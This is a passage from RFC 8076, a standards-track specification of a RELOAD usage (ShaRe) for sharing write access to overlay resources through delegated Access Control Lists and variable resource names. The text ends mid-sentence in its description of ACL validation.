3, 4, 5] underscore map --data '{"a": [1, 4], "b": [2, 8]}' '_.max(value)' # [4, 8] echo '{"foo":1, "bar":2}' | underscore map -q 'console.log("key = ", key)' # "key = foo\nkey = bar" underscore pluck --data "[{name : 'moe', age : 40}, {name : 'larry', age : 50}, {name : 'curly', age : 60}]" name # ["moe", "larry", "curly"] underscore keys --data '{name : "larry", age : 50}' # ["name", "age"] underscore reduce --data '[1, 2, 3, 4]' 'total+value' # 10 The default format. Outputs strictly correct, human-readible JSON w/ smart whitespace. This format has received a lot of love. Try the '--color' flag. { dense JSON using JSON.stringify. Efficient, but hard to read. { formatted JSON using JSON.stringify. A bit too verbose. { a richer 'inspection' syntax. When printing array-and-object graphs that can be generated by JSON.parse, the output is valid JavaScript syntax (but not strict JSON). When handling complex objects not expressable in declarative JavaScript (eg arrays that also have object properties), the output is informative, but not parseable as JavaScript. { num: 9, bool: true, str1: "Hello World", object0: { }, object1: { a: 1, b: 2 }, array0: [ ], array1: [1, 2, 3, 4], array2: [1, 2, null, undefined, , 6], date1: 2012-06-28T22:02:25.993Z, date2: 2012-06-28T22:02:25.993Z{ ], fn4: [Function],!" } } } Uses Node's 'util.inspect' to print the output { num: 9, bool: true, str1: 'Hello World', object0: {}, object1: { a: 1, b: 2 }, array0: [], array1: [ 1, 2, 3, 4 ], array2: [ 1, 2, null, undefined, , 6 ], date1: Thu Jun 28 2012 15:02:25 GMT-0700 (PDT), date2: { Thu, 28 Jun 2012 22:02:25 GMT ] '3': 'three', prop1: 1, prop2: 2 }, fn4: { [Function] '3': 'three', prop1: 1, prop2: 2 },!' } } } If data is a string, it is printed directly without quotes. If data is an array, elements are separated by newlines. Objects and arrays-within-arrays are JSON formated into a single line. The stock example does not convey the intent of this format, which is designed to enable traditional text processing via JavaScript and to facilitate flattening of JSON lists into line-delimited lists. MessagePack binary JSON format Þ�£num ¤boolästr1«Hello World§object0€§object1‚¡a¡b¦array0¦array1”¦array2–ÀÀÀ¥date1¸2012-06-28T22:02:25.993Z¥date2¸2012-06-28T22:02:25.993Z¤err1€¤err2ƒ¥three¥prop1¥prop2¦regex1€¦regex2ƒ¥three¥prop1¥prop2£fn1€£fn2€£fn3ƒ¥three¥prop1¥prop2£fn4ƒ¥three¥prop1¥prop2¥null1À¦undef1À¤deep‚¡a‘‚§longstrÚ�This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed!¡b¡c€¡g§longstrÚ�This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed! Textual representation of MessagePack <de><00><15><a3>num<09><a4>bool<c3><a4>str1<ab>Hello World<a7>object0<80><a7>object1<82><a1>a<01><a1>b<02><a6>array0<90><a6>array1<94><01><02><03><04><a6>array2<96><01><02><c0><c0><c0><06><a5>date1<b8>2012-06-28T22:02:25.993Z<a5>date2<b8>2012-06-28T22:02:25.993Z<a4>err1<80><a4>err2<83><03><a5>three<a5>prop1<01><a5>prop2<02><a6>regex1<80><a6>regex2<83><03><a5>three<a5>prop1<01><a5>prop2<02><a3>fn1<80><a3>fn2<80><a3>fn3<83><03><a5>three<a5>prop1<01><a5>prop2<02><a3>fn4<83><03><a5>three<a5>prop1<01><a5>prop2<02><a5>null1<c0><a6>undef1<c0><a4>deep<82><a1>a<91><82><a7>longstr<da><00><8f>This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed!<a1>b<81><a1>c<80><a1>g<81><a7>longstr<da><00><8f>This really long string will force the object containing it to line-wrap. Underscore-cli is smart about whitespace and only wraps when needed! Let's play with a real data source, like. For convenience (and consistent test results), an abbreviated version of this data is stored in example-data/earthporn.json. First of all, note how raw unformatted JSON is really hard to parse with your eyes ... {"kind":"Listing","data":{"modhash":"","children":[{"kind":"t3","data":{"domain":"i.imgur.com","banned_by":null,"media_e mbed":{},"subreddit":"EarthPorn","selftext_html":null,"selftext":"","likes":null,"saved":false,"id":"rwoa4","clicked":fa lse,"title":"Eating breakfast in the Norwegian woods! Captured with my phone [2448x3264] ","num_comments":70,"score":960 ,"approved_by":null,"over_18":false,"hidden":false,"thumbnail":"","s ubreddit_id":"t5_2sbq3","author_flair_css_class":null,"downs":352,"is_self":false,"permalink":"/r/EarthPorn/comments/rwo a4/eating_breakfast_in_the_norwegian_woods_captured/","name":"t3_rwoa4","created":1333763527,"url":" hBFe.jpg","author_flair_text":null,"author":"pansermannen","created_utc":1333738327,"media":null,"num_reports":null,"ups ":1312}},{"kind":"t3","data":{"domain":"imgur.com","banned_by":null,"media_embed":{},"subreddit":"EarthPorn","selftext_h tml":null,"selftext":"","likes":null,"saved":false,"id":"rwgmb","clicked":false,"title":"The Rugged Beauty of Zion NP Ut ah at Sunrise [OC] (1924x2579)","num_comments":5,"score":72,"approved_by":null,"over_18":false,"hidden":false,"thumbnail ":"","subreddit_id":"t5_2sbq3","author_flair_css_class":null,"downs" :20,"is_self":false,"permalink":"/r/EarthPorn/comments/rwgmb/the_rugged_beauty_of_zion_np_utah_at_sunrise_oc/","name":"t 3_rwgmb","created":1333755348,"url":"","author_flair_text":null,"author":"TeamLaws","created_utc": 1333730148,"media":null,"num_reports":null,"ups":92}},{"kind":"t3","data":{"domain":"flickr.com","banned_by":null,"media _embed":{},"subreddit":"EarthPorn","selftext_html":null,"selftext":"","likes":null,"saved":false,"id":"rvuiu","clicked": false,"title":"Falls and island near Valdez, AK on a rainy day [4200 x 3000]","num_comments":10,"score":573,"approved_by As I've already mentioned, it would be trivial to pretty print the data with 'underscore print'. However, if we are just trying to get a sense of the structure of the data, we can do one better: TODO: working on a 'summarize' command -- INSERT_THAT_HERE (2012-05-04) Now, let's say that we want a list of all the image titles; using a json:select query, this is downright trivial: cat example-data/earthporn.json | underscore select .title Which prints: [ ]' ] If we want to grep the results, 'text' is a better format choice: cat example-data/earthporn.json | underscore select .title --outfmt text] Let's create code-style names for those images using the 'camelize' function from [underscore.string] (). cat earthporn.json | underscore select '.data .title' | underscore map 'camelize(value.replace(/\[.*\]/g,"")).replace(/[^a-zA-Z]/g,"")' --outfmt text Which prints ... FjarrgljfurCanyonIceland NewTownEdinburghScotland SunriseInBryceCanyonUT KariegaGameReserveSouthAfrica ValleDeLaLunaChile FrostedTreesAfterASnowstormInLaaxSwitzerland Try doing THAT with any other CLI one-liner! This one is straight out of our own Makefile: underscore -i package.json process 'vv=data.version.split("."); vv[2]++; data.version=vv.join("."); data;' -o package.json This is one I did at work the other day. Chrome --> Dev Console (CMD-OPT-J) --> Network Tab --> (right click context menu) --> Save All as HAR. I have no idea why it's called a "HAR" file, but it's pure JSON data ... pretty verbose stuff, but I just want the urls ... cat site.har | underscore select '.url' --outfmt text | grep mydomain > urls.txt Well, I'd also like to ack through the contents of all those files. Best to get a local snapshot of it all: cat urls.txt | while read line; do curl $line > $(echo $line | perl -pe 's/https?://([^?]*)[?]?.*/$1'); done And I'm off to the races analyzing the behavior and load ordering of a complex production site that dynamically loads (literally) hundreds of individual resources off the network. Sure, I could have viewed all that stuff inside Chrome, but I wanted a local directory-structured snapshot that I could serve on a local Nginx instance by adding entries in /etc/hosts that mapped the production domains to 127.0.0.1. Now I can run the exact production site locally, make changes, and see what they would do. Look at Examples.md for a more comprehensive list of examples. This section is intended to capture all the places where I spent a great deal of effort to get the best possible behavior on something subtle. aka "polish". It also captures some of the intended "best behaviors" that I haven't had cycles to implement yet. When using the 'template' command, we go to great length to provide a fully debuggable experience. We have a custom version of the template compilation code (templates are compiled to JS and then evaluated) that ensures a 1:1 mapping between line numbers in the original *.template file and line numbers in the generated JS code. This code is then loaded as if it were a real Node.js module (literally, using a require() statement). This means that should anything go wrong, the resulting stack traces and sytax exceptions will have correct line numbers from the original template file. This one is a bit CoffeeScript inspired. When we parse command-line expressions for commands like 'map', they are evaluated as NodeScript objects. This allows us to retrieve the last value in the expression. In a previous version we wrapped expressions in function boilerplate; however this blocked the use of semicolons within an expression. With first class Script objects, we can evaluate multiple semicolon delimited expressions and still capture the value from the last expression evaluated. Thus, all of the following expressions will return "10". underscore run '5 + 5' underscore run 'x=5; y=5; x+y;' underscore run 'x=5, y=5, x+y;' This even works to find the last evaluated value inside conditional branches (these also return 10): underscore run 'x=5; if (x > 0) { 10; } else { 0; }' # last value is 10 underscore run 'x=5; if (x > 0) { y=5; } else { y=-99; } x+y;' # last value is 'x+y' In general, the principle here is that the code should just return what you intuitively expect without requiring much thought. If you type a CoffeeScript expression and forget to use the '--coffee' flag, Underscore-CLI will first attempt to parse it as JavaScript, and if that fails, parse it as CoffeeScript. However, a warning is emitted: "Warning: Parsing user expression 'foo?.bar?.baz' as CoffeeScript. Use '--coffee' to be more explicit." Why do we print a warning? Unfortunately, there are a number of language features that are ambiguous between JS and Coffee. ie, expressions that are valid in both languages but with different meaning. For example: test ? 10 : 20; // JS: if test is true, then 10, else 20 test ? 10 : 20; // Coffee: if test is true, then test, else {10: 20}. Tragic. Loading the 'coffee-script' npm module takes 50+ ms. JSONSelect is another 5ms. That may not sound like much time, but it's the difference between 153 ms and 93 ms, and 153 ms is definitely human perceivable. It will also make a difference if you are writing a quick-and-dirty bash loop that executes underscore-CLI repeatedly. Plus, fast just feels good. A few more notes... Node.js takes about 33 ms to run "hello world", and 45ms if you either "require('fs')" or 'require' anything that's not pre-compiled into the node executable (pretty hard to avoid that). Adding underscore, underscore.string and a few of node's pre-compiled modules, and basic code loading takes ~60 ms. That leaves ~33 ms spent on actually running code that initializes the command list and decides what to do with the command-line args that were passed in. 3rdly, as of v0.2.16, underscore-CLI now marks these packages as "optionalDependencies", meaning that on the minority of systems where there is an issues installing one of those packages (there was a report of problems with msgpack), the overall underscore-CLI installation won't fail. As mentioned above, dense JSON is nearly unreadable to human beings, so we want to pretty print it. JSON.stringify will accept an 'indentation' parameter that does make JSON much more readible; however, this will put everything on a new line resulting in output that is silly verbose -- printing "[1, 2, 3, 4]" will take up 6 lines despite having only 12ish characters. Node's "util.inspect" is a bit better, but it doesn't print valid JSON (eg, inspect uses single instead of double quotes). I don't want to compromize on JSON compatibility just to get pretty output. So I wrote my own formatter that gives the best of both worlds. The default output format is strictly JSON compatible, human readible, yet avoids excessive verbosity by putting small objects and arrays on a single line where possible. The formatting code is also pretty flexible, allowing me to support colorization and a bunch of other nifty features; at some point, I may break the formatter into it's own npm module. TBI - as of this version, if there is no data, we will block for reading STDIN. We should only do this if the user expression refers to the well-known 'data' variable. This would unify the 'process' and 'run' commands. TBI - as of this version, the last evaluated expression value is always returned. However, sometimes, you want to mutate the existing data instead of returning a new value. This should be easy. If the expression does something like 'data.key = value', then the return value should be 'data'. Today, you have to write 'data.key = value; data'. I want that last part to be implicit, but only if you mutate the data variable. And there should be a command-line flag "--retval={expr,data,auto}", with 'auto' being the default. TBI - as of this version, all commands slurp the entire input stream and parse it before doing any data manipulation. This works fine for the vast majority of scenarios, but if you actually had a 30GB JSON file, it would be a bit clunky. For set-oriented commands like 'map', a smarter core engine plus a smarter JSON parser could enable stream-oriented processing where data processing occurs continuously as the input is read and streamed to the output without ever needing to store the entire dataset in memory at once. This feature requires a custom JSON-parser and some serious fancy, but I'll get to it eventually. If you have any performance-sensitive use-cases, post an issue on Github, and I'd be glad to work with you. I strongly encourage bug reports and feature requests. I'll look at all of them eventually, though if I'm slammed at work or have something happening in my personal life, I might get a little bit behind. It is my hobby project after-all, and by all means, you are welcome to submit a pull-request which I'll get to a heck of a lot faster than a feature I have to build myself :) When reporting a bug that might be related to a dependency, it's usually helpful to list out which platform you are on. Here's my info (as of 2012-11-05): # uname -a Darwin ddopson.local 11.4.2 Darwin Kernel Version 11.4.2: Thu Aug 23 16:25:48 PDT 2012; root:xnu-1699.32.7~1/RELEASE_X86_64 x86_64 i386 MacBookPro10,1 Darwin # node -v v0.8.1 # npm -v 1.1.35 # npm ls underscore-cli@0.2.16 /Users/Dopson/work/other/underscore-cli ├── coffee-script@1.4.0 ├─┬ commander@1.0.5 │ └── keypress@0.1.0 ├── JSONSelect@0.4.0 ├─┬ mocha@1.6.0 │ ├── commander@0.6.1 │ ├── debug@0.7.0 │ ├── diff@1.0.2 │ ├── growl@1.5.1 │ ├─┬ jade@0.26.3 │ │ └── mkdirp@0.3.0 │ ├── mkdirp@0.3.3 │ └── ms@0.3.0 ├── msgpack@0.1.7 ├── underscore@1.4.2 └── underscore.string@2.3.0
https://www.npmjs.com/package/underscore-cli
CC-MAIN-2015-27
refinedweb
3,691
56.55
How to create a Heart using C Graphics Prerequisite: graphics.h, How to include graphics.h? The task is to write a C program to draw a Heart using graphics in C. We provide nothing but the best curated videos and practice problems for our students. Check out the C Foundation Course and master the C language from basic to advanced level. Wait no more, start learning today! Approach: To run the program we have the include the below header file: #include <graphic.h> We will create a Heart with the help below functions: - rectangle(x1,y1,x2,y2): A function from graphics.h header file is responsible for creating rectangle on the screen. - ellipse(x,y,a1,a2,r1,r2): A function from graphics.h header file is responsible for creating ellipse on the screen. - line(x1,y1,x2,y2): A function from graphics.h header file which draw a line. - setfillstyle(pattern, color): The header file graphics.h contains setfillstyle() function which sets the current fill pattern and fills color. - floodfill(pattern, color): function is used to fill an enclosed area. The current fill pattern and fill color is used to fill the area. Below is the implementation of to draw Heart using graphics in C: C Output: Below is the output of the above program: My Personal Notes arrow_drop_up
https://www.geeksforgeeks.org/how-to-create-a-heart-using-c-graphics/
CC-MAIN-2021-43
refinedweb
222
68.67
Answered by: UpdateSourceTrigger and BindingExpression(Base) are missing? From what I can tell the TextBox still updates its binding based on LostFocus (as it does in SL/WPF so I guess that's good that its consistent) but there doesn't seem to be a way to change/override that. There is no UpdateSourceTrigger on the Binding - not that I expected it given that SL didn't have LostFocus/PropertyChanged values in that enum anyway. However the BindingExpression(Base) classes do not seem to be available in WinRT. With the latter at least one could get the BindingExpression and call UpdateSource to force the source to be updated with the value of the target. How should one go about forcing a binding of the TextBox's Text property to push its value into the Binding? Question Answers - All replies @AndrewS Thank you for reporting this issue. We're working on mitigation. In the Developer Preview bits, I haven't found a way to force the source to update using binding. You can however forgo binding for now and listen for the TextChanged event and set a property manually. Any other scenarios you need UpdateSourceTrigger for? - Proposed as answer by Aaron Wroblewski Wednesday, November 02, 2011 7:40 PM - Edited by Aaron Wroblewski Wednesday, November 02, 2011 7:49 PM - - That really isn't a very good workaround. I could live with that if we could get to the BindingExpression in code and then call UpdateSource when the TextChanged was invoked. However BindingExpression(Base) doesn't exist in WinRT. We're writing 3rd party controls and we don't necessarily know the target of the binding. - Why is this even marked as answer? This is unacceptable. All this promoting of MVVM, and then as soon you deviate from the simplest UI expectations, you're supposed to ditch it? I don't want to wire up ten textboxes, mess with the XAML and forgo the whole MVVM thing. I agree to the fact that this issue/question should not be marked as solved, since it is a very poor solution in an MVVM, or any loosly coupled coding scenario for that matter. UpdateSourceTrigger with PropertyChanged came to the WP7 Mango release, so why can't you add the same thing here. Why is WinRT only Silverlight 3 XAML capable instead of Silverlight 4 or 5? It is also really bad that it's not even possible to implement a Behavior to solve this issue since we are missing BindingExpression and UpdateSource method, etc. In the first release of WP7 we could at least use the WP7 behavior, UpdateTextBindingOnPropertyChanged, from Prism to solve this issue, but that's not even possible here. Please let me know of any other possible and not so bad solution, and PLEASE fix this for the final release since the Binding functionality in WinRT feels years behind the current technologies! Hi. I am starting to walk my first steps with WinRT and I was also a little bit surprised, and a bit frightened I might add, when I discovered about the inexistence of UpdateSourceTrigger property in Binding class, and the inexistance of BindingExpression thus disabling explicit bind updates (not to talk about the MultiBinding class). I suspect this has nothing to do with being preview versions of Windows 8 SDK. Instead I feel that all heavy behaviors were a filtered and purged thus leaving for the developer to implement custom scenarios. Don't forget that we can now dive into the guts of the beast using C++. But I bet what you need is a solution, not a dissertation. In fact to tackle this problem, which is keep the MVVM approach, you have two options, well two flavors of the same option. Create your own DependencyProperty to use as an attached behavior. What made sense for me was to create an attached dependency property. But by reading the new WinRT API documentation it became clear that attached dependency properties are used only with value types, but the solution I had in mind included binding to an Action<string>. Enough talking. Here's how I extended a TextBox to add the behavior you are talking about: public class ExtendedTextBox : TextBox { public static readonly DependencyProperty CustomActionProperty = DependencyProperty.Register( "CustomAction", typeof(Action<string>), typeof(ExtendedTextBox), new PropertyMetadata(null, OnPropertyChanged)); public Action<string> CustomAction { get { return (Action<string>)GetValue(CustomActionProperty); } set { SetValue(CustomActionProperty, value); } } private static void OnPropertyChanged(DependencyObject d, DependencyPropertyChangedEventArgs e) { if(e.NewValue != null) (d as ExtendedTextBox).TextChanged += ExtendedTextBox_TextChanged; else (d as ExtendedTextBox).TextChanged -= ExtendedTextBox_TextChanged; } async static void ExtendedTextBox_TextChanged(object sender, TextChangedEventArgs e) { await CoreWindow.GetForCurrentThread().Dispatcher.RunAsync(CoreDispatcherPriority.Normal, () => (sender as ExtendedTextBox).CustomAction((sender as ExtendedTextBox).Text)); } } I am being a little bit exausting with the use of Dispatcher since I haven't had enough time to consolidate the async programming model in WinRT. public Action<string> UpdateBindedViewModelProperty { get { return new Action<string>((value) => NewLabelName = value); } } <plmrfc:extendedtextbox</plmrfc:extendedtextbox> Hope it helps. Let me know if something's still bugging you. - Proposed as answer by Pedro Frederico Sunday, June 17, 2012 12:39 PM - Edited by Pedro Frederico Sunday, June 17, 2012 1:18 PM Very good call, I'm using this code! However, its very unfortunate that I have to subclass textbox and write a ton of code that I'm sure will look cryptic to me in six months, just to get around a framework restriction in a slightly more elegant way than simply handling textchanged events in code and totally breaking the MVVM model. This is definitely the better of two evils... Well you should be aware that subclassing means that the implicit style that you might define needs to be your derived type - at least that's how SL/WPF have worked. So if you create a style that targets TextBox it will not affect this derived control. You will need to create a style that targets this type (although you could use the basedon to point to the textbox style). To me this approach doesn't address the issue. First, you need to define and expose a delegate for every property you wish to bind to that might require this. While this might be acceptable for an application developer, for a control developer this is a real mess since this would clutter the public api with something that shouldn't even be needed. Even for an application developer I would think this would be a pain because now every time your designer is creating xaml that binds the text property they need to go to the developer to have them create a delegate that they can bind this other property to and they have to keep that in sync with the property they are binding the text property to. This is even worst if the binding of the text property was using a valueconverter because the action method would need to know to do the same logic or know what value converter was used in xaml to be able to do the same conversion. Also, this doesn't address the other use case about being able to get to the binding expression. That is, to be able to leave the property as updating on lost focus but conditionally being able to tell the binding infrastructure to push the value back into the source of the binding (via the UpdateSource method of the BindingExpression). - You can create a wrapper class so you dont have to do this each time; the source code is here: and dont Bind to Text but BindableText property. If MS intended to make WinRT apps more responsive, by dropping this useful feature, they have presumably done the exact opposite. By forcing developers to come up with workarounds that tend to be less fine tuned than MS could do,! See my post here for a behaviour based workaround which doesn't require subclassing the TextBox:
http://social.msdn.microsoft.com/Forums/windowsapps/en-US/775f1692-2837-471c-95fc-710bf0e9cc53/updatesourcetrigger-and-bindingexpressionbase-are-missing?forum=winappswithcsharp
CC-MAIN-2014-41
refinedweb
1,314
50.77
Rcpp 0.11.5 Want to share your content on R-bloggers? click here if you have a blog, or here if you don't. The new release 0.11.5 of Rcpp just reached the CRAN network for GNU R, and a Debian package has also been be uploaded. Rcpp has become the most popular way of enhancing GNU R with C++ code. As of today, 345 packages on CRAN depend on Rcpp for making analyses go faster and further; BioConductor adds another 41 packages, and casual searches on GitHub suggests dozens mores. This release continues the 0.11.* release cycle, adding another large number of small bug fixes, polishes and enhancements. Since the previous release in January, we incorporated a number of pull requests and changes from several contributors. This time, JJ deserves a special mention as he is responsible for a metric ton of the changes listed below, making Rcpp Attributes even more awesome. As always, you can follow the development via the GitHub repo and particularly the Issue tickets and Pull Requests. And any discussions, questions, … regarding Rcpp are always welcome at the rcpp-devel mailing list. See below for a detailed list of changes extracted from the NEWS file. Changes in Rcpp version 0.11.5 (2015-03-04) Changes in Rcpp API: - An error handler for tinyformat was defined to prevent the assert()macro from spilling. - The Rcpp::warningfunction was added as a wrapper for Rf_warning. - The XPtrclass was extended with new checked_getand releasefunctions as well as improved behavior (throw an exception rather than crash) when a NULL external pointer is dereferenced. - R code is evaluated within an R_toplevelExecblock to prevent user interrupts from bypassing C++ destructors on the stack. - The Rcpp::Environmentconstructor can now use a supplied parent environment. - The Rcpp::Functionconstructor can now use a supplied environment or namespace. - The attributes_hiddenmacro from R is used to shield internal functions; the R_ext/Visibility.hheader is now included as well. - A Rcpp::printfunction was added as a wrapper around Rf_PrintValue. Changes in Rcpp Attributes: - The pkg_types.hfile is now included in RcppExports.cppif it is present in either the inst/includeor src. - sourceCppwas modified to allow includes of local files (e.g. #include "foo.hpp"). Implementation files (.cc; .cpp) corresponding to local includes are also automatically built if they exist. - The generated attributes code was simplified with respect to RNGScopeand now uses RObjectand its destructor rather than SEXPprotect/unprotect. - Support addition of the rngparameter in Rcpp::exportto suppress the otherwise automatic inclusion of RNGScopein generated code. - Attributes code was made more robust and can e.g. no longer recurse. - Version 3.2 of the Rtools is now correctly detected as well. - Allow ‘R’ to come immediately after ‘***’ for defining embedded R code chunks in sourceCpp. - The attributes vignette has been updated with documentation on new features added over the past several releases. Changes in Rcpp tests: - On Travis CI, all build dependencies are installed as binary .debpackages resulting in faster tests..
https://www.r-bloggers.com/2015/03/rcpp-0-11-5/
CC-MAIN-2021-17
refinedweb
497
50.12
Can one write sth like: class Test(object): def _decorator(self, foo): foo() @self._decorator def bar(self): pass @Test._decorator(self) What you're wanting to do isn't possible. Take, for instance, whether or not the code below looks valid: class Test(object): def _decorator(self, foo): foo() def bar(self): pass bar = self._decorator(bar) It, of course, isn't valid since self isn't defined at that point. The same goes for Test as it won't be defined until the class itself is defined (which its in the process of). I'm showing you this code snippet because this is what your decorator snippet transforms into. So, as you can see, accessing the instance in a decorator like that isn't really possible since decorators are applied during the definition of whatever function/method they are attached to and not during instantiation. If you need class-level access, try this: class Test(object): @classmethod def _decorator(cls, foo): foo() def bar(self): pass Test.bar = Test._decorator(Test.bar)
https://codedump.io/share/cuHmTjDeNwwg/1/python-decorators-in-classes
CC-MAIN-2017-04
refinedweb
174
54.93
Request for Comments: 8076 Category: Standards Track ISSN: 2070-1721 T. Schmidt, Ed. HAW Hamburg G. Hege daviko GmbH M. Waehlisch link-lab & FU Berlin March 2017 A Usage for Shared Resources in RELOAD (ShaRe) Abstract This document defines a REsource LOcation And Discovery that is useful whenever peer-independent rendezvous processes. Shared Resources in RELOAD . . . . . . . . . . . . . . . . . 5 3.1. Mechanisms for Isolating Stored Data . . . . . . . . . . 6 4. Access Control List Definition . . . . . . . . . . . . . . . 7 4.1. Overview . . . . . . . . . . . . . . . . . . . . . . . . 7 4.2. Data Structure . . . . . . . . . . . . . . . . . . . . . 9 5. Extension for Variable Resource Names . . . . . . . . . . . . 10 5.1. Overview . . . . . . . . . . . . . . . . . . . . . . . . 10 5.2. Data Structure . . . . . . . . . . . . . . . . . . . . . 11 5.3. Overlay Configuration Document Extension . . . . . . . . 12 6. Access Control to Shared Resources . . . . . . . . . . . . . 13 6.1. Granting Write Access . . . . . . . . . . . . . . . . . . 13 6.2. Revoking Write Access . . . . . . . . . . . . . . . . . . 14 6.3. Validating Write Access through an ACL . . . . . . . . . 14 6.4. Operations of Storing Peers . . . . . . . . . . . . . . . 15 6.5. Operations of Accessing Peers . . . . . . . . . . . . . . 16 6.6. USER-CHAIN-ACL Access Policy . . . . . . . . . . . . . . 16 7. ACCESS-CONTROL-LIST Kind Definition . . . . . . . . . . . . . 17 8. Security Considerations . . . . . . . . . . . . . . . . . . . 17 8.1. Resource Exhaustion . . . . . . . . . . . . . . . . . . . 17 8.2. Malicious or Misbehaving Storing Peer . . . . . . . . . . 18 8.3. Trust Delegation to a Malicious or Misbehaving Peer . . . 18 8.4. Privacy Issues . . . . . . . . . . . . . . . . . . . . . 18 9. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 19 9.1. Access Control Policy . . . . . . . . . . . . . . . . . . 19 9.2. Data Kind-ID . . . . . . . . . . . . . . . . . . . . . . 19 9.3. XML Namespace Registration . . . . . . . . . . . . . . . 19 10. References . . . . . . . . . . . . . . . . . . . . . . . . . 20 10.1. Normative References . . . . . . . . . . . . . . . . . . 20 10.2. Informative References . . . . . . . . . . . . . . . . . 20 Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . 21 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 22 1. Introduction [RFC6940] defines the base protocol for REsource LOcation And Discovery (RELOAD), which allows for application-specific extensions by Usages. The present document defines such a RELOAD Usage for managing shared write access to RELOAD Resources and a mechanism to store Resources with variable names. [RFC7904], or distributed conferencing). Of particular interest are rendezvous processes, where a single identifier is linked to multiple, dynamic instances of a distributed cooperative service. Shared write access is based on a trust delegation mechanism it must contain the username of the Resource creator. 2. Terminology The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119]. This document uses the terminology and definitions from the RELOAD base [RFC6940] and [RFC7890], in particular the RELOAD Usage, Resource, and Kind.: - Storage of the Resource/Kind pairs to be shared. - Storage of an Access Control List (ACL) associated with those Kinds. ACLs are created by the Resource Owner and contain ACL items, each delegating the permission of writing the shared Kind to a specific user called the the initial field within the Kind data, and write concurrency does not occur. If the data model of the Shared Resource is an array, each Authorized Peer that chooses to write data SHALL obtain its exclusive range of the array indices. The following algorithm will generate an array indexing scheme that avoids collisions: - Obtain the Node-ID of the certificate that will be used to sign the stored data. - Take the least significant 24 bits of that Node-ID to prefix the array index. - Append an 8-bit individual index value to those 24 bits of the Node-ID. The resulting 32-bit long integer MUST be used as the index for storing an array entry in a Shared Resource. The 24 bits of the Node-ID serve as a collision-resistant identifier. The 8-bit individual index remains under the control of a single Peer and can be incremented individually for further array entries. In total, each Peer can generate 256 distinct entries for application-specific use. The mechanism to create the array index inherits collision-resistance from the overlay hash function in use (e.g., SHA-1). It is designed to work reliably for small sizes of groups as applicable to resource sharing. In the rare event of a collision, the Storing Peer will refuse to (over-)write the requested array index and protect indexing integrity as defined in Section 6.1. A Peer could rejoin the overlay with a different Node-ID in such a case.. Therefore, each Access Control List data structure0102 represents the first trust delegation to an Authorized Peer that is thus permitted to write to the Shared Resource of Kind-ID 1234. Additionally, the Authorized peer Alice is also granted write access to the ACL as indicated by the allow_delegation flag (ad) set to 1. This configuration authorizes Alice to store further trust delegations to the Shared Resource, i.e., add items to the ACL. On the contrary, index 0x456def0103. Note that overwriting existing items in an Access Control List with a change in the Kind-ID revokes all trust delegations in the corresponding subtree (see Section 6.2). Authorized Peers are only enabled to overwrite existing ACL item they own. The Resource Owner is allowed to overwrite any existing ACL item, but should be aware of its consequences on the trust delegation chain. +------------------------------------------------------+ | Access Control List | +-----------+------------------------------+-----------+ | #Index | Array Entries | signed by | +-----------+------------------------------+-----------+ | 123abc01 | to_user:Owner Kind:1234 ad:1 | Owner | +-----------+------------------------------+-----------+ | 123abc02 | to_user:Alice Kind:1234 ad:1 | Owner | +-----------+------------------------------+-----------+ | 123abc03 | to_user:Owner Kind:4321 ad:1 | Owner | +-----------+------------------------------+-----------+ | 123abc04 | to_user:Carol Kind:4321 ad:0 | Owner | +-----------+------------------------------+-----------+ | ... | ... | ... | +-----------+------------------------------+-----------+ | 456def01 | to_user:Bob Kind:1234 ad:0 | Alice | +-----------+------------------------------+-----------+ | ... | ... | ... | +-----------+------------------------------+-----------+ Figure 1: Simplified Example of an Access Control List, Including - Entries for Two Different Kind-IDs and Varying Delegation (AD) - Configurations Implementors: res_name_ext: This optional field contains the Resource Name of a ResourceNameExtension (see Section 5.2) to be used by a Shared Resource with a variable resource name. This name is used by. 5. Extension for Variable Resource Names 5.1. Overview In certain use cases, such as conferencing, username (or Node-ID) while storing data under a specific Resource-ID (see Section 7.3 in [RFC6940]). which one is a substring of the other. In such cases, the holder of the shorter name could threaten to block the resources of the longer-named peer by choosing the variable part of a Resource Name to contain the entire longer username. For example, a "*$USER" pattern would allow user EVE to define a resource with name "STEVE" and to block the resource name for user STEVE through this. consists patterns usernames. It is noteworthy that additional constraints on the syntax and semantic of names can apply according to specific Usages. For example, Address of Record (AOR) syntax restrictions apply when using P2PSIP [RFC7904], MUST username field (with $USER preceding and $DOMAIN succeeding the '@'). Both variables MUST be present in any given pattern definition. Furthermore, variable parts in <pattern> elements defined in the overlay configuration document MUST remain syntactically separated from the username part (e.g., by a dedicated delimiter) to prevent collisions with other names of other users. If no pattern is defined for a Kind, if the "enable" attribute is false, or if the regular expression does not meet the requirements specified in this section, the share:pattern { xsd:string }* }? Whitespace and case processing follows the rules of [OASIS.relax_ng] and XML Schema Datatypes [W3C.REC-xmlschema-2-20041028]. 6. Access Control to Shared Resources 6.1. Granting Write Access Write access to a Kind that is intended to be shared with other RELOAD users can be initiated solely by the Resource Owner. A Resource Owner can share RELOAD Kinds by using the following procedure: - The Resource Owner stores an ACL root item at the Resource-ID of the Shared Resource. The root item contains the ResourceNameExtension field (see Section 5.2), the username of the Resource Owner and Kind-ID of the Shared Resource. The allow_delegation flag is set to 1. The index of array data structure MUST be generated as described in Section 3.1. - Further ACL items for this Kind-ID stored by the Resource Owner MAY. For each succeeding ACL item, the Resource Owner increments its individual index value by one (see Section 3.1) so that items can be stored in the numerical order of the array index starting with the index of the root item. An Authorized Peer with delegation allowance ("ad"=1) can extend the access to an existing Shared Resource as follows: - newly). 6.2. Revoking Write Access Write permissions are revoked by storing a nonexistent value (see [RFC6940], Section 7.2.1) at the corresponding item of the Access Control List. Revoking a permission automatically invalidates all delegations performed by that user including all subsequent delegations. This allows the invalidation of entire subtrees of the delegations tree with only a single operation. Overwriting the root item with a nonexistent. To protect the privacy of the users, the Resource Owner SHOULD overwrite all subtrees that have been invalidated. with strings compared as binary objects. It proceeds as follows: - Obtain the username of the certificate used for signing the data stored at the Shared Resource. This is the user who requested the write operation. -. - Select the username of 